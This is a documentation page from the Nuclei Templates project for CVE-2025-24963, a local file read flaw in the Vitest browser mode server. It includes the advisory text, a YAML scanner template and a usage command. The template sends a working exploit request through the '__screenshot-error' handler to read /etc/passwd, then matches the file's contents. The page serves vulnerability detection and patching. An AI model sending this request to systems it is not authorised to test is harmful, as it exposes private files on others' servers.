Skip to content
Nuclei Templates

Vitest Browser Mode - Local File Read

ID: CVE-2025-24963

Severity: medium

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2025,vitest,browser,mode,lfi

Description

Section titled “Description”

Vitest is a testing framework powered by Vite. The __screenshot-error handler on the browser mode HTTP server that responds any file on the file system. Especially if the server is exposed on the network by browser.api.host- true, an attacker can send a request to that handler from remote to get the content of arbitrary files.This __screenshot-error handler on the browser mode HTTP server responds any file on the file system. This code was added by commit 2d62051. Users explicitly exposing the browser mode server to the network by browser.api.host- true may get any files exposed. This issue has been addressed in versions 2.1.9 and 3.0.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2025-24963


info:
  name: Vitest Browser Mode - Local File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Vitest is a testing framework powered by Vite. The `__screenshot-error` handler on the browser mode HTTP server that responds any file on the file system. Especially if the server is exposed on the network by `browser.api.host- true`, an attacker can send a request to that handler from remote to get the content of arbitrary files.This `__screenshot-error` handler on the browser mode HTTP server responds any file on the file system. This code was added by commit `2d62051`. Users explicitly exposing the browser mode server to the network by `browser.api.host- true` may get any files exposed. This issue has been addressed in versions 2.1.9 and 3.0.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/advisories/GHSA-8gvc-j273-4wm5
    - https://github.com/vitest-dev/vitest/blob/f17918a79969d27a415f70431e08a9445b051e45/packages/browser/src/node/plugin.ts#L88-L130
    - https://github.com/vitest-dev/vitest/commit/2d62051f13b4b0939b2f7e94e88006d830dc4d1f
    - https://github.com/vitest-dev/vitest/security/advisories/GHSA-8gvc-j273-4wm5
    - https://vitest.dev/guide/browser/config.html#browser-api
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24963
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2025-24963
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,vitest,browser,mode,lfi


http:
  - raw:
      - |
        GET /__screenshot-error?file=/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*


    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(content_type,'image/png')"
          - "contains_all(body,'root',':*:','/bin/')"
        condition: and
# digest: 490a0046304402200d8443d2a5ae444fda81d501998659849b9487ae0851dbd963372f6658e3928b02202558e854630f2452b20e071f9a6a814aedac7ec9e631d769fab8fbfefbb46dc8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-24963.yaml"

View on Github